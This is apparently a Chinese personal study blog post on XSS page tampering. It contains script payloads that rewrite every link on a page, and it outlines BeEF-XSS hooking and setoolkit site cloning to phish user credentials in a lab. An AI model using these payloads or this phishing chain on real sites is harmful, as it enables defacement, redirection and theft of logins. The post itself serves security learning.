XSS个人学习 之网页篡改

如图所示,我们的替换取得了成功

现在我们将链接修改一下,看是否会成功,

<script>
window.onload = function() {
var link=document.getElementsByTagName("a");
for(j = 0; j < link.length; j++) {
   link[j].href="《原神》官方网站-全新4.2版本「罪人舞步旋」上线!";}
}
</script>

为什么这个行,我那个不行啊

更改成功

<script>
window.onload = function() {
var link=document.getElementsByTagName("a");
for(j = 0; j < link.length; j++) {
   link[j].href="https://www.bilibili.com/video/BV1Ej411a7aC/?spm_id_from=333.1007.tianma.1-1-1.click&vd_source=0ea44b920ed1fd1399137d5f52bd358d";}
}
</script>
这是XSS篡改链接的代码

成功了

页面跳转成功

通通被替换

用beef-xss生成恶意的链接

如图所示

注意 leafpad是文本软件

由此可知 kali机器的ip地址是192.168.56.129

注意如果想要输入的xss语句成功反弹到beef-xss上就必须在kali的攻击机上的浏览器访问八个页面进行语句的插入

setroolkit伪造网站

启动setrookit

选择1 

选择3.

选择2进行站点克隆

直接进行回车

输入要克隆的站点地址  如图所示是一个 我们教学的地址

如图所示

可以看到本机IP地址

xss跳转克隆网站

发现不能输入了 去控制台更改编写的长度

将这里更改长度 

我们看到了用户的账户和密码

登陆完跳转成功

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
对于下载含有XSS漏洞的网页源码,首先要明确XSS(跨站脚本攻击)是一种常见的网络安全漏洞,攻击者通过注入恶意脚本代码,使用户在浏览网页时受到攻击。 为了下载含有XSS漏洞的网页源码,我们可以按照以下步骤操作: 1. 确定目标网页:首先,需要明确要下载的网页具有XSS漏洞。通常,这需要通过漏洞扫描工具或者手动分析目标网站的源码来判断。 2. 搭建测试环境:为了避免网站的实际访问影响到我们的操作,我们可以搭建本地测试环境。使用Web服务器软件(如Apache、Nginx等)和相应的网页源码托管目录,搭建一个本地网站。 3. 复制目标网页:在搭建的本地测试环境中,通过浏览器访问目标网页,并将其完整的HTML源码复制下来。 4. 编辑源码:使用文本编辑器打开复制的HTML源码文件,并进行相关修改。由于涉及到安全漏洞,建议仅用于学习、研究和测试目的,并遵守法律法规。 5. 保存并访问:保存修改后的源码文件,并重新启动搭建的本地测试环境。通过浏览器访问本地测试环境中的网页,即可下载含有XSS漏洞的网页源码。 需要提醒的是,下载、分析和利用网页源码是一个需谨慎对待的行为。未经授权或滥用此技术可能会导致法律责任。因此,在进行任何相关活动之前,请确保了解相关法律法规,并获得相关授权和许可。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值